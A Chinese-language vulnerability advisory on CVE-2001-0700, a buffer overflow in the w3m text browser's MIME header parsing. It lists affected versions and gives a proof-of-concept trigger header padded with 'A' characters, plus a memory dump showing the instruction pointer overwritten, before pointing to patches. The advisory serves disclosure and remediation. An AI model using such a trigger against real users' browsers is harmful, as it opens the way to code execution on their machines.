首页 -> 安全研究

安全研究

安全漏洞
W3M 畸形MIME头缓冲区溢出漏洞

发布日期:2001-06-19
更新日期:2001-07-03

受影响系统:

W3M 0.2.1
W3M 0.2
W3M 0.1.9
W3M 0.1.8
W3M 0.1.7
W3M 0.1.6
W3M 0.1.4
W3M 0.1.3
W3M 0.1.10
描述:

BUGTRAQ  ID: 2895
CVE(CAN) ID: CVE-2001-0700

w3m是一个文本方式的web浏览器,与lynx很类似。它的一个处理MIME头的函数存在一个
缓冲区溢出漏洞。如果用户使用w3m下载一个恶意的web页面,恶意web服务器的管理员可以
在w3m客户的主机上以该用户身份执行任意代码。

<*来源:OGASAWARA Satoshi   (LAC / s.ogaswr@lac.co.jp)
        KOBAYASHI Shigehiro (LAC / sigehiro@lac.co.jp)
        [SNS Advisory No.32] w3m malformed MIME header Buffer Overflow Vulnerability:
        http://www.lac.co.jp/security/english/snsadv_e/32_e.html
*>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


如果web页面中包含如下格式的MIME头:
      =?AAAAAAAAAAAAAA(50个 'A' )AAAAAAAA?=

那么使用w3m打开时就会发生溢出:
  memory dump:
xbffff8a0: 0x41414141 0x41414141 0x41414141 0x41414141
xbffff8b0: 0x41414141 0x41414141 0x41414141 0x41414141
xbffff8c0: 0x41414141 0x41414141 0x41414141 0x41414141
xbffff8d0: 0xbf0a4141 0x080e0000 0x00000001 0x080792c3

  register:
ESP:          0xbffff8d0
EIP:          0x41414141


建议:

厂商补丁:

w3m的开发邮件列表上提供了两个临时的补丁:

http://mi.med.tohoku.ac.jp/~satodai/w3m-dev/200106.month/2066.html
http://mi.med.tohoku.ac.jp/~satodai/w3m-dev/200106.month/2067.html

我们也建议使用w3m的用户关注厂商主页以获取最新版本:
http://ei5nazha.yz.yamagata-u.ac.jp/~aito/w3m/eng/index.html


浏览次数:3879
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障